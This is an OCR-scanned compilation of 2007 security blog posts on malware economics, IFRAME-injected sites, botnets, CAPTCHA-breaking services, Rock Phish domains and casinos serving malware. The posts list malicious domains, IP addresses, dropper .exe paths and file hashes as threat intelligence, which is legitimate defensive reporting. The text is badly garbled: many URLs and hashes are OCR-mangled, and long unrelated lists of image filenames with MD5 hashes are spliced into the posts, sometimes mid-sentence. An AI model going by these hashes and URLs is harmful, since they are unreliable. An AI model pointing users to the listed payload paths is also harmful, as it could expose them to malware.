Malware authors consolidate with stronger strategic partners, and acquire the weaker ones by 
providing them with DIY malware creation tools in order for them to make the headlines at a 
later stage, consolidate too. Malware authors keep it simple the stupids, you fight back with 
rocket science theoretical models and shift the focus from the pragmatic reality just the way it 
is - consolidation, outsourcing, shift towards a service based economy, quality and assurance 
of the malware releases, malicious economies of scale in the form of malware exploitating kits, 
ones it’s getting hard to keep track of these days. 


At the bottom line, how to solve the "malware problem"? It all depends on who you’re 
solving it for. Long live marginal thinking. 


Related posts: 

[5]Malware - Future Trends, January, 2006 

[6]Underground Economy’s Supply of Goods and Services 

[7]The Dynamics of the Malware Industry - Proprietary Malware Tools 
[8]Managed Spamming Appliance - The Future of Soam 

[9]Multiple Firewalls Bypassing Verification on Demand 


1. http://arstechnica.com/news.ars/post/20071120-making-malware-unprofitable-economics-key-to-slowing-hacke 


2. http: //www.top500. org/ 
3. http://dilbert .com/comics/dilbert/archive/images/dilbert2007 113333116. gif 


> 


http: //www.dshield.org/diary .html1?date=2007- 11-20 


5. http: //www.windowsecurity.com/uplarticle/networksecurity/malware-trends.pdf 

6. http: //ddanchev. blogspot . com/2007/03/underground-econonys-supply-of- goods . htm] 
7 lisep //aanchey Sloponst cra/ 3007/10 ageansee eo ericare custey weal 

8. http: / /adancnev blogspot. con/2007/10/nanaged-spanning-appliances~future=of tal 
o, hep://ddanchev blogspot. con/2007/10/m1tiple-firevalls~ bypassing. ht 
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3.11.28 1 See Alive IFRAMEs Everywhere - Part Two (2007-11-27 22:40) 


Username: | 


Password: 


The never ending IFRAME-ing of relatively popular or niche domains whose popularity is 
attracting loyal and well segmented audience, never ends. Which leads us to part two of this 
series [l]uncovering such domains and tracing back the malicious campaign to the very end 
of it. Some of these are still IFRAME-ed, others cleaned the IFRAMEs despite Google’s warning 
indicating they’re still harmful, the point is that all of these are connected. 


Affected sites : 


Epilepsie France - epilepsie-france.org 

Iran Art News - iranartnews.com 

The Media Women Forum - yfmf.org 

Le Bowling en France - bowling-france.fr 

The Hong Kong Physiotherapists Union - hkpu.org 
The Wireless LAN Community - wlan.org 

The First HELLENIC Linux Distribution - zeuslinux.gr 


The entire campaign is orbiting around pornopervoi.com, which was last respond- 
ing to 81.177.3.225, an IP that’s also known to be hosting a fake bank (weiterweg- 
intlcom) according to [2]Artists Against 419. Within the domain, there were 
small files loading a second IFRAME. For instance, pornopervoi.com/u.php leads to 
88.255.94.246/freehost1/georg/index.php?id=0290 (WebAttacker), the same campaign is 
also active at 81.29.241.238/freehost1/georg/index.php?id=0290, these try to drop the 
following : 


88.255.94.246/freehost1/chris0039/lu/dm 0039.exe 
81.29.241.238/freehost1/chris0031/lu/dm 0031.exe 
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An [3]Apophis C &C panel was located in this ecosystem as well. Among the other files 
at pornopervoi.com, are pornopervoi.com/i.php where we’re redirected to the second one 
spelredeadread.com/in.php?adv=678. Even more interesting, energy.org.ru a Web hosting 
provider is also embedded with pornopervoi.com/m.php again forwarding to spelredead- 
read.com. To further expand this ecosystem, yfmf.org the Media Women Forum is also 
IFRAME-ed with a link pointing to pornopervoi.com/m.php. Another site that’s also pointing to 
pornopervoi.com/m.php is the Hong Kong Physiotherapists Union hkpu.org. Two more sites 
serving malware, namely wlan.org, the Wireless LAN Community also pointing to pornoper- 
voi.com/m.php, and zeuslinux.gr, The First HELLENIC Linux Distribution. 


Who's behind this malware embedded attack? It’s the ongoing consolidation between 
defacers, malware authors, and blackhat SEO-ers using the [4]infamous infrastructure of the 
RBN. 


Related posts: 

[5]Bank of India Serving Malware 

[6]U.S Consulate in St.Petersburg Serving Malware 
[7]Syrian Embassy in London Serving Malware 
[8]CISRT Serving Malware 

[9]Compromised Sites Serving Malware and Spam 
[10]A Portfolio of Malware Embedded Magazines 
[11]Possibility Media’s Malware Fiasco 

[12]The "New Media" Malware Gang 

[13]Another Massive Embedded Malware Attack 


. http: //ddanchev. blogspot .com/2007/11/i-see-alive-iframes-everywhere.htm 
. http: //db.aa419. org/fakebanksview. php?key=21091 


ttp://pandalabs.pandasecurity.com/archive/Has-your-credit-card-been-stolen_3F00_.aspx 


1 

2 

3. 

a 

5 

6. 

7. 

8. 

9. 
10. 
11. http: //ddanchev.blogspot.com/2007/10/possibility-medias-malware-fiasco.htm 


12. http://ddanchev.blogspot .com/2007/11/new-media-malware-gang.htm 
13. http://ddanchev.blogspot.com/2007/11/another-massive-embedded-malware-attack.htm 
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3.11.29 Are You Botnet-ing With Me? (2007-11-27 22:48) 


Informative and [1]recently released study by ENISA on the problem of botnets, especially the 
emphasis on how [2]client side vulnerabilities surpassed email attachments, and downloading 
of infected files as [3]infection vectors. Not because these aren’t working, but because of the 
botnet’s masters attitude for achieving malicious economies of scale has changed. Despite 
that we can question whether or not they put so much efforts while strategizing this, let’s say 
they stopped pushing malware, and started coming up with ways for the end users to pull it 
for themselves : 


"The most common infection methods are browser exploits (65 %), email attachments 
(13 %,) operating system exploits (11 %), and downloaded Internet files (9 %). Currently, the 
most dangerous infection method is surfing to an infected webpage. Indications of a bot on 
your computer include e.g.: Slow Internet connection, strange browser behavior (home page 
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change, new windows, unknown plug-ins), disabled anti-virus software; unknown autostart 
programs etc." 


Here’s the entire publication - "[4]Botnets - The Silent Threat" by David Barroso. 


1. http: //www.enisa.europa.eu/pages/02_01_press_2007_11_27_botnets.htm 
2. http: //ddanchev. blogspot .com/2007/09/popular-web-malware-exploitation.htm 
3. http: //ddanchev. blogspot .com/2007/07/malware- embedded-sites- increasing. htm 


4. http://www.enisa.europa.eu/doc/pdf/deliverables/enisa_pp_botnets. pdf 


3.11.30 A TrustedSource for Threats Intell Data (2007-11-27 22:52) 


What is TrestedSeerce? | Secure Computing Corporation 


ee eee eae : Research Portal 
&} TrustedSource a a 
| Home | Feedback Research Resources Tools Threats and Trends About 
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Continue 
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Following [1]the series of posts on [2]early warning security events systems, Secure Comput- 
ing [3]have just announced a major upgrade of their [4]threat intell service : 


"Secure Computing’s [5]TrustedSource acts like a satellite advanced-warning system for the 
Internet that detects suspicious behavior patterns at their origins, and then instructs security 
devices to take corrective precautions or action," said Dr. Phyllis Schneck, vice president of 
research integration for Secure Computing. "TrustedSource pinpoints reputation by looking at 
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behavior and specific factors such as traffic volumes, patterns and trends, and enabling it to 
rapidly identify deviations from the norm on a minute-by-minute basis." 


I’ve already mentioned the radical perspective of integrating all the publicly known IPs with 
bad reputation, and sort of ignoring their online activities in order to prevent common prob- 
lems such as click fraud for instance. Think from the end user’s perspective, what’s the worst 
thing that could happen to both the average and experienced end user? Try witnessing the 
situation when a known to be infected with malware end user [6]starts receiving messages 
like these, and will continue to receive them until a certain action is taken presumably disin- 
fecting themselves. Of course, it’s more complex than it sounds, but start from the basics 
in terms of the incentives for end users to disinfect themselves, the masses of which aren’t 
that very socially oriented unless of course it’s global warming and the possibility for a white 
Christmas you’re talking about. Issuing an "[7]Internet Driver’s License" wouldn’t work on an 
international scale, and even if it works on a local scale somewhere in the world, it wouldn’t 
really matter, since you'll have the rest of the world driving unsafely, and you'll be the only 
country which has fastened its seat belt. Here’s [8]an example of such mode of thinking. 


. http: //ddanchev. blogspot .com/2007/11/yet-another-malware-outbreak-monitor.htm 
. http: //ddanchev.blogspot .com/2007/06/early-warning-security-event-systems .htm 
. http: //money.cnn.com/news/newsfeeds/articles/marketwire/0332356.htm 

. http://www.eweek.com/article2/0, 1895, 2222390, 00.asp 

. http: //trustedsource.org 


~ 


. http: //www.mustap.com/media/googlevirus. gif 


. http://www.wired.com/politics/security/news/2007/06/bot_strateg 


. http: //ddanchev.blogspot.com/2007/07/insecure-bureaucracy-in-germany.htm 


ON oA UFWN FE 
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3.11.31 Which CAPTCHA Do You Want to Decode Today? (2007-11-28 23:12) 
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Once you anticipate your success, you logically start putting more efforts into achieving a 
decent level of efficiency in the process of [1]breaking CAPTCHA, now that’s of course in 
between commercializing your know-how. CAPTCHA breaking or decoding on demand has 
been [2]a reality for a while, with malicious parties empowered by [3]proprietary tools, publicly 
available [4]DIY CAPTCHA breakers, or services like this one doing it on demand. 


The following service is offering the possibility for CAPTCHA decoding on a per web ser- 
vice basis, and enticing future customers by providing percentage of accuracy, the price, and 
the ease of difficulty of breaking it. CAPTCHA decoding is listed for the following services : 
9you, tiancity, cncard, the9, kingsoft, taobao, dvbbs, shanda, csdn, chinaren, monter, and 
baidu. The hardest to break CAPTCHAs mentioned are those of Yahoo, Hotmail, QQ, Google. 
Moreover, Ticketmaster’s the most expensive one, followed by Ebay’s CAPTCHA decoding 
process. 


What happens when malicious parties cannot directly decode the CAPTCHA? They figure 
out ways to adapt to the situation, namely by enjoying the benefits of the human factor in the 
process while sacrificing some of the efficiency, but continuing to achieve their objective. 


1. http: //ddanchev. blogspot .com/2007/03/vladuzs-ebay-captcha-populator.htm 
2. http: //www.eweek.com/article2/0, 1895, 2211589, 00.asp 
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3. http://ddanchev. blogspot . com/2007/09/spammers-and-phishers-breaking-captchas.htm 
4. http://ddanchev. blogspot . com/2007/10/diy-captcha-breaking-service.htm 


3.11.32 66.1 Host Locked (2007-11-28 23:39) 


sl.eviservers. net nikogonet,com 


neSoe.com 


212,199.95, 108, static.012.net.il nod-For-pe.com 


endor.eurodns.com 


endor.eurodns.com 


Having found a static pattern for identifying a [1]Rock Phish domain a couple of months ago 
in the form of the bogus "[2]209 Host Locked" message, the [3]Rock Phishers seems to have 
picked up the finding and changed the default domain message to "66.1 Host Locked" as of 
recently. Here are the very latest Rock Phish domains using this : 


business-eb.bbt.com.4rrt.es 
ntu3ot1.com 

nikogonet.com 

ne5o0e.com 

nod-for-pc.com 
sparkasse.de.4rrt.es 
marip.com.es 


Moreover, a [4]recently released survey results by Cloudmark, whose study into the [5]Eco- 
nomics of Phishing is also worth going through, indicates that current and prospective cus- 
tomers of a certain brand lose trust in it, if they’re exposed to phishing emails pretending to 
be from that brand : 


The survey revealed that: 


- 42 % of respondents surveyed fee! that the trust in a brand would be greatly reduced if they 
received a phishing email claiming to be sent by that brand 


- 41 % of those surveyed felt that their trust in a bank would be greatly reduced if they received 
a phishing email claiming to be from that company, compared to 40 % who felt the same for 
an ISP, 36 % for an online shopping site and 33 % for a social networking site 


- 26 % of those surveyed fee! that they are the party most responsible for protecting themselves 
from phishing attacks, with 23 % believing their Internet Service Provider (ISP) or email service 
provider is the most responsible and 17 % thinking that the sender’s ISP and email service 
provider holds the greatest responsibility 


The last point is perhaps the most insightful one, given it has to do with self-awareness and 
responsibility, forwarding the responsibility to the provider of the email service, and best of all, 
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ext _irpng 
7fo59fa0f305bd6bff1f0b0148a7c9aa 
ext _is.png 
49a36ca65dd2379daa34f1d907340045 
ext _it.png 
9f2481486c23964f783bf0486d56ba59 
ext _je.png 
90c719a4ba45848160b5eb8ad5dc9645 
ext _jm.png 
9a3c7414fb3604f7156aedc6b8264ab5 
ext jo.png 
ed18d70d9c169eb642f46eb0c43f1109 
ext jp.png 
f4559d19401d1b8daa607805c091a221 
ext ke.png 
fcO2e4fb30cldda9fécfd95fb14538c1 
ext _kg.png 
a223c1b8eae837d1b38550bb2942e2e0 
ext kh.png 
6b4b1c07b9a50dfd15dcc93c95a3b9F0 
ext _ki.png 
3cde39a74becb763e69fe2a26d760218 
ext _km.png 
5b414b36af63focbf5de282f33ca79d7 
ext _kn.png 
3d576395933539329173e0c505a3cc62 
ext kp.png 
dafddec1011f75e0a9c9b49920e9a9b6 
ext _kr.png 
dc83a91cdb602d4b5ecb381c5875551a 
ext _kw.png 
91d9e6c27896999bbc590fc8b1126al1d 
ext _ky.png 


4674d5be257395acabel7e909a678c09 
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ext _kz.png 
f6a9743aee9ea04fc16e48e6ad520356 


ext _la.png 
3b445b6aec129db1d8b436925d2dc8c7 
ext _Ib.png 
a80810bcd5c9c52272bb1c938cb0ae99 
ext _Ic.png 
268110e1d8a557fac85bc0880021e06c 
ext _li.png 
a0b027ef3e79115085b28a1415cc7ffc 
ext _Ik.png 
4c1202bccdf4acf7e585cc376c4e28f7 
ext _Irpng 
33061f635060954015af4f2a7217cb71 
ext _Is.png 
baddb215e434e175238dabbcf35f52d1 
ext _It.png 
7cOccf834ff46945a29f14f16a27a412 
ext _lu.png 
6ba58b29b5cd47a84fc66798a8al4ael 
ext _Iv.png 
ecd14c7323284bfb74cadb3aaab0ccf6 
ext _ly.png 


7abbc707071037436a95561bcOccObel 
ext ma.png 
29177604729732994a5cce088e0db82t 
ext _mc.png 
aecdb6e8361fa6e98682b8ca7afédfdc 
ext _md.png 
b06982248d6587afc57d8b3e69fa1l602 
ext _mg.png 
daae02d6c4333977fd7f1954f6cf65b5 
ext _mh.png 
65de7d020284997fbf4f5644b4d9e831 
ext _mil.png 
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b67b0a68430f3b5c0ac2e96fc73150fd 
ext _mk.png 
469fb74c2108b7515587336f27d1a40b 
ext _ml.png 
Ofe8996ca2a432f8d9f9ICef424617762 
ext _mm.png 
5557936f4088c3f3f107f7f9 7b6fcbd4 
ext mn.png 
4cd5b8904f7fbddbd1801cb8e3f4495e 
ext _mo.png 
3028ed358d08e9d3cd9c18d69e6909b4 
ext _mp.png 
b575e931115fcafef3de6fl6dd07d3a4 
ext _mq.png 
638e671ac6430010c6dc2026b42a88fb 
ext _mr.png 
199b78c4283cd365e01347a6e5420411 
ext ms.png 
0a4306b5056985d594a109dd7754cf46 
ext _mt.png 
c44bf5001e436d33b9aaa3b89dceed0a 
ext _mu.png 
87ba72cad8b20d106c5047e26f6f713e 
ext _museum.png 
2493ecea84f24f78e0c913aa2283ad07f 
ext _mv.png 
05c41fc0d9ae23d23ea384792f81165a 
ext mw.png 
cf942d4c7083el1fc43cf2b23947clce0 
ext _mx.png 
f81¢2c670114425a70350bd62251label 
ext _my.png 
€005d693697428d77ab0767c9e8c3505 
ext _mz.png 
cade1583492f74837de8c3126cflacf7 
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ext _na.png 
514a73ead3d35b629eb2b0ddf04cd48f 
ext name.png 
653c9b3a8894e23d74cc8eec29b38fd0 
ext _nc.png 
6da15ab81957bb2c36673d2e45bc05d4 
ext _ne.png 
76cacb1c6db7b0412d8979e6ded74703 
ext _net.png 
e6a32d14855fa41365cf5bb63a6de5fd 


ext _nf.png 
30f21c8c5f21bac35f088b47be147 6af 
ext _ng.png 
9231b690fd0642b99dbfa8777b3c658c 
ext _ni.png 
ae325658bdfe5b8294134cbd35b09933 
ext _nl.png 
c1093ff4378258ed7813405317a6612d 
ext _no.png 
8aa36a0fbb188d5598fc4e0b89c9764d 
ext _np.png 
81c636ae45f32fdda74ee462f2822355 
ext _nr.png 

8ebeb6f7 70622a936d5813f36bf1d89b 
ext _nu.png 


223949a575795cda4ed95e64451a5ad0 
ext numeric.png 
7a854f4c03300c39b6d512b56c089ee0 
ext _nz.png 
04bf2b66a9c644963bb7d95bf480e8ad 
ext _om.png 
5c13386bc5be49ba8cc0416131f32066 
ext _org.png 
8686bc7c834a3f8balcd21bd9ecf6ddc 
ext _pa.png 
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seeking more responsibility in [6]fighting outgoing phishing and spam compared to incoming 
one. 


. http: //ddanchev. blogspot .com/2007/09/paypal-and-ebay-phishing-domains. html 

. http: //ddanchev. blogspot .com/2007/09/209-host-locked. html 

. http: //ddanchev. blogspot .com/2007/10/assessing-rock-phish- campaign .html 

. http://www. cloudmark.com/serviceproviders/media/releases/?release=2007-11-26 


. http: //ddanchev. blogspot .com/2007/08/economics-of-phishing .html 


Ou FWN FE 


. http: //www.windowsecurity.com/articles/Popular-Spammers-Strategies-Tactics html 


3.11.33 Malware Serving Online Casinos (2007-11-30 00:04) 


Fabis Palms Online Casino : Casino gambling has never been so much fun! 


CONTACT US SECURITY TESTIMOMIALS BANKING HOME 


Welcome to Fabis Paims Online Casino! Since 2000, more than 40 million games have 
been played and over $100,000,000 US processed through our online casino 
software. We have wekcomed more than 50,000 players, many of whom have 
remained w@h us from the start. Fabis Palms Online Casino has one of the best 
selection of casino games on the internet today. Why not take advantage of our 


Payment 
Methods 
Accepted 


huge bonus on all new casino accounts and have tun with us? Our progressive 
jackpots reguiarly go over the $250,000 mark, so why not try us oul and win a 


iife-changing sum of money? 


or Actual screenshots of the casino software 
esranse > 
§ wo Gi 
~ ote, ae ~_ 
4 & a 


Ne “S 
7 > 


[1]Don’t play poker on an infected table part two. The following three online casinos are 
currently serving embedded malware in the form of IFRAMES and the average javascript 
obfuscation. 


The first one is pokergagnantscasino.com (213.186.33.4) with current obfuscation loading 
statistics-gdf.cn/ad/index.php (116.0.103.133) where another obfuscation loads, deobfus- 
cated attempts to load p423ck.exe (Zlob) at statistics-gdf.cn/ad/load.php, playing around 
with the host for too long results in zero malicious activity, at least they make you think so. 
Here’s another internal URL statistics-gdf.cn/ad/index.php?com 
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3352e66d060cd2cOcbadf6c3b2e77c20 
ext _pe.png 
13659f6dc0b782893ae3c68a266df7 Of 
ext _pf.png 
fe868fa091f84e3e6325966631f02c42 
ext pg.png 
f3b3f4a8ef9c4fec3683fc48e32092af 
ext _ph.png 
130cd2e5a806cabcc9ed7dc1335ffa26 
ext _pk.png 
e6fod5a2da5b41573d4a6533c9076133 
ext _pl.png 
4c19802cf2a284fc7fd42f6e9cc8535c 
ext _pm.png 
7279926ed96bce59a65cd466febc9595 
ext pn.png 
211ded216b19059e43b34b5c75df8435 
ext _prpng 
2977b145b58b6bfa4d5c5e89038bf414 
ext _pro.png 
2493eea84f24f78e0c913aa2283ad07F 
ext _ps.png 
90773fc72ef537756967fb16e52fa243 
ext _pt.png 
7ff667a349c76388a7b02de8aaab9a8e 
ext pw.png 
€19b6c793839678ddfa348d92f48de9e 
ext _py.png 
O02dde77bacf4de936e319e29d9992cd7 
ext _ga.png 
9008c40612e292ecblae8aab625dd4b18 
ext _re.png 
3722f8¢c856d985a9c20c3d072a738972 
ext _ro.png 
€119644bc16261453ee0324f535ba47d 
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ext _ru.png 
f37ddd9eb26d12ba377377a349901475 
ext _rw.png 
18902fle4be89f2044bc00e6617e27eb 
ext sa.png 
625cee5001b4a36addd4fa002d62b775 
ext sb.png 
39ac2d9f567048eaa361291e67ac94c5 
ext _sc.png 
307f18a795427d2a7bbb2b6b0d7e9fla 
ext _sd.png 
7fed58ab8ed4b89665478a25d583f49a 
ext se.png 
d995b8265009d1555685d6696795a6d0 
ext _sg.png 
4147b011led6dcbb3dede67a75d1629e0 
ext _sh.png 
d401c55158clac8af9f6caf86al7e1f4 
ext _si.png 
cb9d00660f0a26855883faa09c5d90d5 
ext _sj.png 
8aa36a0fbb188d5598fc4e0b89c9764d 
ext _sk.png 
ad196840101e3b0eb15261dc0f50e080 
ext _sl.png 
2e980d1bab2c5ef701d2e489ab18825c 
ext _sm.png 
129ef20f078a0c47689645cbfaaf2a30 
ext _sn.png 
9fa980ef09cf971d268d40ec081b999c 
ext _so.png 
83b43c3ec245bdal1f367bb803581f830 
ext _sr.png 
8e1c144198468bf54651ca23d7a88al10 
ext _st.png 
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f58b16ffa69faf4a470614683cf583f5 
ext _su.png 
dc7f3ebf41ba4b711eccc30e8749fe47 
ext sv.png 
a0d6189530386fd10cd2bfla7f6a1640 
ext sy.png 
1d0f5940cc12e33f73dd0cc85b0a57f2 
ext _sz.png 
7d5086250c4f3c6c94f0laf39ca507f5 
ext _tc.png 
23831d760a2d76d466838a3b4703baf7 
ext _td.png 
291dae8d5a189ad578c0a88d47312ec6 
ext _tf.png 
923c80156d3405d2092e4ee4af3fb3a8 
ext _tg.png 
36fc4138f6ea719ca9a044a85edeb60c 
ext _th.png 
9ab6ff5e2cbc7f735a384614d7c9b96d6 
ext _tj.png 
d7b972ab025125d4a2a49fdfe4f3d128 
ext _tk.png 
b266d848314d2bd2d5a326834f33c3e3 
ext _tl.png 
c48a92a795f215d8e37f3d37b5f1f3fd 
ext _tm.png 
c877491879988d276cfOf90d13b06c0e 
ext _tn.png 
4492b2190770b527c80ab6ab6d4ec4f9e0 
ext _to.png 
56b09bf339876e7382a1916cd8ed83b9 
ext tp.png 
c48a92a795f215d8e37f3d37b5f1f3fd 
ext _trpng 
f17954d904de8357467fb83flcac6ca9 
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ext _tt.png 
89004123b0aab23d125b9a3b2aaaa2c0 
ext _tv.png 
5e8c22d42553d419ab6bedfef49aa2c79 
ext _tw.png 
ece809135ddbe36f06b1b654017116e7 
ext _tz.png 
f6225f4a107c91523f5e98e265caa28a 
ext _ua.png 
4261a6cc916bb549fbaefc48cecd59f0 
ext _ug.png 
96a15eeb71f34f92c81f9fcca665b0bb 
ext _uk.png 
11370d9d776d03af0feb8cd87e4d2ecb 
ext _um.png 
4fedb9ca421f5efc5f458fcedfa19186 
ext _unk.png 
d6d8138896b5c1d1fa2bfc5f91bc80db 
ext _unknown.png 
b38d86f85a0b8ff44288df0104b2e3b5 
ext _us.png 
4fedb9ca421f5efc5f458fcedfa19186 
ext _uy.png 
ealf9427ebbe3e9791ed46fdc0f84125 
ext _uz.png 
aa2a7006f3e6eb71826231c79f989197 
ext _va.png 
454109e61da6138820ddcb0713948662 
ext _vc.png 
625f62de5cfcc92c6b78b5d4dcc682b8 
ext _ve.png 
ea67blafle2427e4df7124e39483ed9c 
ext _vg.png 
c2066d9ebf60d44a1f57d984c0d6b263 
ext _vi.png 
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d4ceddcd4218108b56ff48blea8fb7e6 
ext _vn.png 
3f62f4e87e6a5f13e70aaf3ac381987c 
ext _vu.png 
e8cf7a9025b341c034cfe945eca8a4le 
ext _wf.png 
cdf038f444670fa997fdd7a7c5bf4bce 
ext ws.png 
92fe22feea6bdead1901d28e99b495ef 
ext _ye.png 
013f9ef2ceb7b778c4d3911dc1884eal 
ext _yt.png 
3722f8c856d985a9c20c3d072a738972 
ext _yu.png 
c8db8eaf55d7d9c6333afa90cb4c6990 
ext _Za.png 
9fpc5518151e177b5f91debf7956fa05 
ext _ze.png 
b06b8ccacObfbe3ce2abf96c920de5ee 
ext _zm.png 
5c09fbafe354396b16f2fd2cb2d04962 
ext _zw.png 
29692bbca2983c4c01746906d6eb34fc 
favicon.ico 
la2cbae17370f1lc6c06d96cfa46b8816 
navbar _icol.png 
432b8d5bc78d1c37fcflca7e62c284ea 
navbar _ico2.png 
da20eflfaaf281973cccee412ff2cfcb 
navbar _ico3.png 
dbbda33359244a127ea9739d1871212d 
navbar _ico4.png 
91ac30c136154d5bf7e3a7fecc231b7c 
navbar _ico5.png 
d8aa983273f1d6527b4a31bf0a88el1d2 
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navbar _ico6.png 
9ebb336a894d12812f75cd3829e7 7 6af 
navbar _Ing.png 
d95e2398f3436229314404549758052b 
Os _aix.png 
763a912b2cc8ceece687e47699c16cbc 
OS _amiga.png 
4365150e2d08dd33b4322c480437190c 
os _atheos.png 
€7282749d8628e4fc9b11e22e82c06cf 
os _be.png 
dc0225288200d32126afb6eb7cad776e 
os _bsd.png 
5eb028cf32d053d2edd323d2a7292018 
os _bsdi.png 
7e3f859b75b767f66ae6624e94d61679 
os _darwin.png 
3cc33fc2e52d055f1d4f9880f237c79e 
os _digital.png 
becbd70508f481f225411f636d4bf65c 
os _freebsd.png 
059851c2f4fa5737509089a47329e2c7 
os hp.png 
c4d5af3d320361833b0c7f1d7a0d4112 
os _irix.png 
5b6d338087f393b439b370068e6a967dd 
os _linux.png 
c406a4cee5bd1f34a63f3b82b99celle 
OS _mac.png 
db6c5b0b450480cdcd782a451f8fe2fb 
OS _macosx.png 
ea5f6c57830275eba7e62f1a229204F7 
OS _Mmacppc.png 
44fd48146a5fdbcc19f2566c55439fcf 
os _netbsd.png 
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c6fa7ba300b630845971laeb1l5decebb7 
Os _openbsd.png 

a90fe5a0b6eb7 1leb8ddc0f91876d1fb6 
OS _openvms.png 
7436a776687eb441a55cb25cc499d731 
OS _0S2.png 
2bd983d9f893d7c4581734a35ec7f1f3 
os _palm.png 
2dcb2b3a807a99bff2bf420966718b0c 
OS __qnx.png 
e0eald0cflbb35ce3941f859c0b720e8 
os _question.png 
b38d86f85a0b8ff44288df0104b2e3b5 
Os _risc.png 
2efbf45cde0384ebf9d847d83c9d9b01 
OS __sco.png 
40e6bf2ac42baef98526de8058d8b4c0 
Os _sun.png 
83800c6703aa800c7415147595ac9600 
os symbian.png 
€3036185b815b2f1b87010c9394701dd 
os _tru64.png 
9d5aaedaeb7dbc2e9f2589aff581a2d2 
os _windows.png 
d2ccb649279d017a6b050b1379489ff0 
os _windowsxp.png 
90197accc394afcd17e37dbd30f098e8 
robot _2dehands.png 
9713c499c22a9e4c3dd96a42d2171759 
robot _a2b.png 
1d793cef4815990a0026bfd44b57f3e7 
robot _about.png 

d50a8497 7bb8ef35f823d325d6bd9494 
robot _acoon.png 
3d7fc557e32b54b9c09ee804c2a6191e 
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robot _addy.png 
96d04321080679cd2a0ffc364126ab11 
robot _aleksika.png 
9ac860663b583d55f8048417f5442ed9 
robot _alexa.png 
022d88c0f2ef21bddf3181e4f85d46ac 
robot _alltheweb.png 
72f8b292dea31423177aecd823f97b2 
robot _altavista.png 
1¢c8465a05f2e78091f4011666c7f8b9a 
robot _amfibi.png 
6c7ca913ded44392cf7dbd18861ac274 
robot _amidella.png 
2ad4b310822bab886cOda4dffbOff3df 
robot _aonde.png 
beffb75alca2ff1390475ee9531lee2e4 
robot _aport.png 
5cce09c62e45eff0d5c97939d66b46a4 
robot _arachmo.png 
9cb7d1f44f2962ac53946c7f40c8b342 
robot _askjeeves.png 
09815f1lc8flac92a0e5a9233f03d03b6 
robot _atomz.png 
01c39ef3860fddb634d85f3fd72265ac 
robot _awasu.png 
c39b81a2bfe563b249b7829d85b43bla 
robot _axmo.png 
3daf21cd5727b07d86e5ad1b2df4d8f9 
robot _baidu.png 
ece33fbe9497ecbac05ac20477a78a88 
robot become.png 
132f898102eb160ealb5aa45cbf69bfc 
robot _bitbeamer.png 

f284a5f7 6fc3939db6a2d04e866309db 
robot blogg.png 
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4c749bf48d9093b0a11f1e219343c63f 
robot _bloglines.png 
272b7fcf06d49c5be0bae06651710c70 
robot _blogranking.png 
c2d5d7dcf93f07081c3b6dbbe5136c33 
robot _blogstreet.png 
e9a5eeaf0c3fa34fd0f48d585efe34e7 
robot _blogwatcher.png 
34494c876f94b4be2c1b219e258b93b4 
robot bobby.png 
78c7256af6b22447d789d71c87c0e4d4 
robot _book.png 
fa345aa6503d8520f8c656ac860688d6 
robot _bordermanager.png 
16beb02b6c7d4f8084bc714c10983e22 
robot bottomfeeder.png 
3529bff92bc3e9ed0117dcd571f3c4el 
robot _carp.png 
b67cfd741ee5a7d6c59023751faef69b 
robot _centrum.png 
93ec80fa62d37a1dc46031b27a415a70 
robot _cirilizator.png 
c4e8d8ee989b62e2df4b52fb09082d24 
robot _claymont.png 
3a1878cc69d47daec9456c6770e8b281 
robot _clush.png 
b2df031cf284bab41b073dee84ff2469 
robot _coldfusion.png 
30092cab3675da043b9328191fc8d41c 
robot _comet.png 
f57dcaf3b39d65f1lb5a6cbf55db25333 
robot _convera.png 
75b99e82ab86ffa9cced7c63a3078a39 
robot _creativecommons.png 
578e7d5b240037a339281f32d40a0b42 
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robot _css.png 
612e430c11e64258d19d839d3db3ba5a 
robot _cyberz.png 
acfd63f8d3944b208ac23e398fc656dc 
robot _cynthia.png 
a41ec802f8427d1a6a049dbe8206572d 
robot d4x.png 
1f446d65d32e2dfab96383fc526a53ec 
robot _da.png 
78ac49766bd606e2480455c18afc349f 
robot _delfi.png 
9b9c5cfcafdcca755b9e541e8a35b055 
robot _drupal.png 
291cOc5b5b82cacee23ae17e56be4ce9 
robot _earthcom.png 
79d4579bb99b678eb18d886fd499c906 
robot empas.png 
4dd7cf8545a26bbfcd1390c87ffc3823 
robot _entireweb.png 
78f07fa056589fc60ddc63c544f6c103 
robot _euroseek.png 

8301 faf70f292e608559de20b28244c7 
robot _exabot.png 
cb9866441cb0c5e37e0c9c24aal72833 
robot _excite.png 
10bb53be26aae84257c7c909b65cc75e 
robot _fast.png 
ea1564e1a57d32461ab32ce042d2a95b 
robot _fastbuzz.png 
9c19e2cOb6b4e89ed656cdafa0531d0f 
robot feeddemon.png 
9516e71421e2242ac4294de007225986 
robot feedreader.png 
edcdbfffaf959bbcbee0e1395f2c7 7ef 
robot feedster.png 
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Detection rate : Result: 7/32 (21.88 %) 

File size: 43008 bytes 

MD5: 08f445712adcef5ef091378c51bbbaaa 

SHA1: 3478fe6a600251b2ee147dbd50eaf4f204a884cb 


Last week’s obfuscation at this online casino was pointing to traffmaster.biz/ra/in.cgi?5 
which is now down. 


The second casino is fabispalmscasino.com (82.165.121.138) with current obfuscation 
attempting to connect to the now down statlcount.net/strong, a host residing on a netblock 
| covered before showcasing [2]a scammy ecosystem. The third one is sypercasino.com 
which was resolving to 203.117.111.102 early this week, and taking advantage of WebAt- 
tacker at sypercasino.com/biling/index.php. Now it resolves to 58.65.236.10 and promotes 
banner.casino.com/cgi-bin/SetupCasino.exe 


Detection rate: 9/32 (28.13 %) 

File size: 194077 bytes 

MD5: 26da6f81349ff388d08280ababab9150 

SHAI1: f20e8fee439264915710f9478ec1e74583563851 


It’s interesting to monitor how people behind these manually change the obfuscations 
to further expand their connections with other scammers, or services and attack approaches 
they use, and even more interesting to see it happen [3]on-the-fly just like [4]meds247.org 
for instance. 


Don’t play poker on an infected table. 


1. http: //ddanchev. blogspot .com/2007/09/dont-play-poker-on-infected-table.htm 
2. http://ddanchev.blogspot .com/2007/11/scammy- ecosystem. htm 
3. http: //ddanchev. blogspot .com/2007/10/love-is-psychedelic-too.htm 
4. http://ddanchev. blogspot .com/2007/11/managed-fast-flux-provider.htm 
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ce6f867ca54288821f6daaf4e53cb4db 
robot _findengines.png 
a4a83c1b657d469ea06469d1e4cd84ad 
robot _firefly.png 
€3398d10abfb50a18813fbf15835801e 
robot _flashget.png 
1069f2d34456eaf980c10e2265ea7462 
robot _friend.png 
05ea69c742493ad521faf0f4bd02094b 
robot _frontier.png 
8363d9f006913c8122d442194b945801 
